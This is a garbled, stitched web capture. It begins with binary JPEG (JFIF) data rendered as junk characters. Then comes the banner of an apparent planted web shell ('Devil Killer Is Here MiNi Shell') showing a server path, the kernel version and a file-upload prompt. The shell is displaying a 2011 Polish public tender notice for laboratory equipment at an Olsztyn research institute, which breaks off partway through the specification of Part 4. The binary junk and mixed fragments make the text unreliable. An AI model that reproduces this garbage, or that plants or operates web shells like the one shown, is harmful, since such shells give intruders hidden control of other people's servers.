JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/417968-N-2011.html

<p class="kh_header"><b>Olsztyn: Dostawa specjalistycznej aparatury i pipet automatycznych do prowadzenia prac naukowo-badawczych</b><br>
<b>Numer ogłoszenia: 417968 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk , ul. Tuwima 10, 10-747 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5234692, faks 089 5234693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pan.olsztyn.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa specjalistycznej aparatury i pipet automatycznych do prowadzenia prac naukowo-badawczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę specjalistycznej aparatury i pipet automatycznych do prowadzenia prac naukowo-badawczych do Instytutu Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk w Olsztynie. Zamówienie podzielono na 8 Części:
Część 1 - Waga analityczna elektroniczna -  szt. 1; 
Część 2 - Wytrząsarka mikropłytek na 2 płytki/z opcją na 4 płytki - szt. 1; Wirówko-worteks MultiSpin MSC 6000 (lub produkt równoważny) - szt. 1;
Część 3 - Pipety automatyczne 8-kanałowe Research Plus Multi, o zmiennej pojemności w zakresie: 10-100?l - szt. 1 i 30-300?l - szt. 1;
Część 4 - Mieszadła magnetyczne typu Lab Disc - szt. 2; wirówko-vortex - szt. 1; 
Część 5 - Płuczka mikropłytek - szt. 1; 
Część 6 - Zamrażarka niskotemperaturowa - szt. 1;
Część 7 - Suszarka laboratoryjna - szt. 1; 
Część 8 - Vertex - szt. 1; miniwirówka - szt. 1; termoblok - szt. 1; aparat do blottingu pół suchego - szt. 1
Wymagana gwarancja - min. 12 miesięcy dla Części 1, 2 - wirówko-worteks, 4; min. 24 miesiące dla Części 2 - wytrząsarka mikropłytek, 5, 6, 7, 8; oraz 36 miesięcy dla  Części 3.
Dodatkowe wymagania:
1.	Wykonawca będzie zobowiązany do bezpośredniej dostawy aparatury i pipet automatycznych do laboratorium/pracowni w siedzibie Zamawiającego, wskazanego w umowie, montażu i uruchomienia aparatury (nie dot. pipet automatycznych), a w przypadku Części 5 - instruktażu pracowników Zamawiającego w zakresie obsługi, użytkowania i podstawowej konserwacji/kalibracji sprzętu w ramach ceny oferty.  
2.	Po uruchomieniu w siedzibie zamawiającego, aparatura oraz pipety automatyczne powinny być gotowe do poprawnej, bezkolizyjnej pracy w zakresie wszystkich składowych elementów i funkcji, zgodnie z opisem tych elementów w załączniku nr 1 - specyfikacja. Niedopuszczalne jest, aby dla zapewnienia prawidłowej pracy aparatury lub pipet automatycznych konieczne było instalowanie dodatkowych elementów (urządzeń) lub oprogramowania w późniejszym czasie, szczególnie za dodatkową opłatą.
3.	W okresie obowiązywania gwarancji Wykonawca zapewni nieodpłatny serwis aparatury i automatycznych pipet.
4.	Czas reakcji przyjęte zgłoszenie - podjęta naprawa - max. 48 godz. (część 5); max. 72 godz. (Część 2)
5.	Czas naprawy gwarancyjnych zobowiązujących dostawcę do wymiany urządzenia (podzespołu) na nowy - max. 3 naprawy.
6.	Maksymalny termin naprawy - 14 dni.
7.	W przypadku czasu trwania naprawy gwarancyjnej dłuższego niż 14 dni - dostawca zapewnia sprzęt zastępczy na czas trwania naprawy (dot. Części 5).
8.	W przypadku nie dokonania naprawy ww. określonych terminie, nastąpi wymiana wadliwego egzemplarza aparatury lub pipet automatycznych na nowe o parametrach nie gorszych niż uszkodzone, bez dodatkowych opłat.
9.	Wymiana aparatury i  pipet automatycznych, w okresie gwarancji na nowe, nastąpi w przypadku 3 awarii uniemożliwiających ich eksploatację w pełnym zakresie funkcjonalnym.
10.	W przypadku wymiany uszkodzonej aparatury lub pipet automatycznych na nowe lub wymiany podzespołu obowiązywać będą warunki gwarancji i serwisu, wynikające ze złożonej oferty.
11.	Transport aparatury lub pipet automatycznych do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy.
12.	Zamawiający zastrzega sobie prawo odstąpienia od umowy ze względu na wadę fizyczną lub prawną dostarczonej aparatury lub pipet automatycznych.
13.	Dostarczona aparatura i pipety automatyczne muszą posiadać instrukcję obsługi w j. polskim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.93.11.00-2, 38.43.71.00-8, 38.43.65.00-5, 38.43.60.00-0, 38.54.00.00-2, 39.71.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie ustanawia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 oraz nr 6 do SIWZ - wykaz wykonanych trzech dostaw urządzeń, aparatury i sprzętu diagnostycznego, każda na kwotę nie mniejszą niż 35000,00 zł, w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbioru, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. 
-wykonawcy załączają dokument potwierdzający, że dostawy zostały wykonane należycie wg załącznika nr 6 do SIWZ.
-wykaz musi zawierać wartość, przedmiot, daty wykonania i odbiorców.
-jeżeli wykonawca na potwierdzenie spełnienia ww. warunku udziału w postępowaniu przedstawi w wykazie wykonanych dostaw wartości wyrażone w innej walucie niż PLN, zamawiający do oceny spełnienia warunków przeliczy podaną wartość po średnim kursie tej waluty w stosunku do PLN publikowanym przez NBP z dnia ogłoszenia postępowania,
-jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia powyższe składa, co najmniej jeden z nich.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty i świadectwa dopuszczenia do obrotu oferowanych urządzeń (jeżeli dotyczą):
a)	deklaracje zgodności,
b)	Certyfikaty: ISO, CE.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem. 
2. Wypełniona przez Wykonawcę Specyfikacja oferowanego produktu wg załącznika nr 1 do Specyfikacji Istotnych Warunków Zamówienia  
3. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia Formularz Oferty 
4. Sporządzony przez Wykonawcę Formularz cenowy wg wzoru stanowiącego załącznik nr 3 do Specyfikacji Istotnych Warunków Zamówienia Formularz Cenowy.
5. Materiały producenta potwierdzające spełnienie wymaganych parametrów technicznych tj. broszury, foldery, instrukcja obsługi itp. (w j. polskim)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących:
1.	dla zmiany terminu realizacji przedmiotu zamówienia:
-ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej;
2.	dla zmiany sposobu spełnienia świadczenia:
a)	zmiany technologiczne, w szczególności:
-niedostępność na rynku urządzenia wskazanego w dokumentacji przetargowej spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku urządzenia. Zaoferowany sprzęt nie może mieć parametrów gorszych niż określone w specyfikacji - załącznik nr 1. Wykonawca zobowiązany jest dostarczyć: oświadczenie od producenta o zaprzestaniu produkcji sprzętu zaoferowanego; wypełnioną specyfikację na nowy sprzęt (załącznik nr 1) wraz z materiałami producenta poświadczającymi spełnienie wymaganych parametrów.;
-pojawieniem się na rynku urządzenia nowszej generacji (bądź w nowszej technologii) pozwalającego na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji przedmiotu umowy. Zaoferowany sprzęt nie może mieć parametrów gorszych niż określono w specyfikacji - załącznik nr 1. Wykonawca zobowiązany jest dostarczyć: oświadczenie od producenta o rozpoczęciu i prowadzeniu produkcji urządzeń nowej generacji lub nowej technologii; wypełnioną specyfikację na nowy sprzęt (załącznik nr 1) wraz z materiałami producenta poświadczającymi spełnienie wymaganych parametrów.;
3.	dla pozostałych zmian:
-zmiana sposobu dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
4.	nie stanowi istotnej zmiany umowy w rozumieniu art. 144 Pzp, w szczególności:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b)	zmiany danych teleadresowych oraz osób wskazanych do kontaktów między stronami.

5.	Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pan.olsztyn.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 12:00, miejsce: Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Waga analityczna elektroniczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Waga analityczna elektroniczna - szt. 1
1	Zakres / odczyt: 100g /0,0001g
2	Obciążenie maksymalne (Max):100g 
3	Działka odczytowa (d): 0.1mg
4	Zakres tarowania: Pełny
5	Klasa dokładności: I
6	Temperatura pracy :18-30°C
7	Czas ważenia: <10s
8	Wymiary szalki [mm]:90
9	Wymiary komory ważenia: nie większe niż 185x150x240 mm
10	Wymiary wagi (z nóżkami): nie większe niż 225(245)x355x360 mm
11	Układ kalibracji wewnętrznej zapewniający utrzymanie dokładności pomiarów w czasie eksploatacji bez ingerencji użytkownika
12	Komora ważenia zamykana przesuwanymi szybkami z trzech stron
13	Podświetlany wyświetlacz LCD
14	Podstawowy pakiet funkcji: liczenie sztuk jednakowych detali, wyliczanie zmian masy w procentach i wskazywanie masy w karatach.
15	Złącze RS232C pozwalające na podłączenie komputera lub drukarki
16	Gwarancja - min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wytrząsarka mikropłytek na 2 płytki/z opcją na 4 płytki oraz Wirówko-worteks.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wytrząsarka mikropłytek na 2 płytki/z opcją na 4 płytki - szt. 1
1	Zakres prędkości obrotów minimum 150 - 800 obr/min.
2	Timer cyfrowy (regulowany od przynajmniej 1 minuty do 23 godz. i 59 minut) z automatycznym wyłącznikiem
3	Średnica ruchu przynajmniej 1 mm
4	W wyposażeniu dodatkowa platforma na wytrząsanie czterech płytek 96 dołkowych
5	Waga nie większa niż 3kg
6	Wymiary urządzenia nie większe 260 x 250 x 100 mm
7	Możliwość używania wytrząsarki w chłodni lub w inkubatorach w temperaturach z zakresu od +5°C do +40°C.
8	Gwarancja - min. 24 miesiące
Wirówko-worteks MultiSpin MSC 6000 - szt. 1
(lub produkt równoważny, spełniający poniżej podane parametry graniczne)
(poniższe informacje wpisuje Wykonawca) 
1	Zakres prędkości (z krokiem 100 obr/min) min.:1000 obr/min, max.:6000 obr/min
2	Maksymalne przyspieszenie odśrodkowe nie mniejsze niż 2000xg
3	Timer wirówki: 1s-99min.
4	Siła mieszania: łagodne, średnie, silne z regulacją czasu trwania
5	Czas mieszania z korkiem: min. co 1 s (0-20s)
6	Do stosowania algorytmu sms (sms-cykler): odwirowanie (z ang. spin), mieszanie (z ang. mix) i ponownego odwirowanie (z ang. second spin)
7	Regulacja cyklu sms: 1-999 cykli
8	Zabezpieczenie: blokada pokrywy
9	Wyposażona w rotory na probówki: rotor R-1,5 (12 x 1,5 mL), rotor R-0,5/0,2 (12 x 0,5 mL + 12 x 0,2 mL), rotor R-2/0,5 (8 x 2 mL + 8 x 0,5 mL)
10	Gwarancja - min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.60.00-0, 42.93.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pipety automatyczne 8-kanałowe Research Plus Multi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pipety automatyczne 8-kanałowe Research Plus Multi, o zmiennej pojemności w zakresie: 10-100?l - szt.1 oraz 30-300?l - szt. 1 - łącznie 2 szt.
(lub produkt równoważny, spełniający poniżej podane parametry graniczne)
1	Pipety automatyczne 8-kanałowe
2	Nastawne w zakresie objętości 10-100?l - 1 sztuka; 30-300?l - 1 sztuka
3	O najwyższej ergonomii (z dodatkowym haczykowatym zakrzywieniem na nasadę palca wskazującego ułatwiającym osadzenie pipety w dłoni)
4	Wykonane z tworzywa trwałego, chemicznie odpornego, z automatycznym zrzutnikiem końcówek,
5	Posiadające system amortyzujący część dolną pipety dla ochrony i lepszego dopasowania końcówek, 
6	Możliwość zmniejszania liczby kanałów
7	Z czteromiejscowym wskaźnikiem nastawiania objętości,
8	Z możliwością autoklawowania pipety w całości
9	Z trwale naniesionym numerem fabrycznym i oznakowaniem zakresu nastawnej objętości
10	Z oddzielnym okienkiem ze wskaźnikiem cyfrowym umożliwiającym szybką kalibrację na ciecz o gęstości innej niż woda i szybki (przy pomocy jednego przekręcenia klucza) powrót do ustawień fabrycznych (na gęstość wody)
11	Z pełną kompatybilnością funkcjonalną i stanowiskową do zestawów pipet serii Eppendorf Research Plus, końcówek Eppendorf, stanowiącą dla zamawiającego uzupełnienie posiadanego wyposażenia laboratoryjnego służącego do odmierzania objętości
12	Konfekcjonowane fabrycznie, w indywidualnym opakowaniu kartonowym, wraz z instrukcja obsługi i akcesoriami niezbędnymi do wykonania konserwacji pipety (smar sylikonowy, klucz do odkręcania pipety, klucz do wymiany sprężynek i uszczelek)
13	Barwny kod na przycisku pipety ułatwiający dobranie odpowiedniego zakresu końcówki
14	Sprawdzone i wykalibrowane fabrycznie, z załączonym przez producenta indywidualnym certyfikatem kalibracji oraz z dostępnym w Polsce autoryzowanym punktem serwisowym   wykonującym usługi w zakresie napraw, konserwacji i kalibracji,
15	Gwarancja - min. 36 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.71.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mieszadło magnetyczne oraz Wirówko-vortex.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszadło magnetyczne typu Lab Disk - szt. 2
(lub produkt równoważny, spełniający poniżej podane parametry graniczne)
(poniższe informacje wpisuje Wykonawca)
1	Płaskie mieszadło magnetyczne bez grzania
